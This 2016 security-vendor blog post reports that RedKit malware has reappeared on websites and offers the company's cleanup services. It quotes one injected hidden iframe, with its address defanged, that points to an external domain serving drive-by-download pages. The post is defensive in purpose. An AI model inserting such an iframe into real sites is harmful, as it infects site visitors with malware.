29 Apr, 2016

RedKit Malware Still Alive

RedKit malware is still a threat to your website’s security. Learn how Quttera can help you detect and remove malware from your site.
Back in 2013, we posted about RedKit infecting significant number of websites. It appears that, three years later, the statistics of the websites submitted to online malware scanner show the revive of this malware among infected websites.
Malicious action
Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Malware entry:
< iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src="hxxp://brg-catalogues[.]com/mzcf.html?j=1886263 >

The URL in src of the iframe hosts another ~15 similar HTML pages (mzcf.html) leading to drive-by-download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:

Google report - 1
Malware clean-up
Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware, Quttera experts are always happy to clean it for you - Malware Monitoring & Cleanup Plans For Websites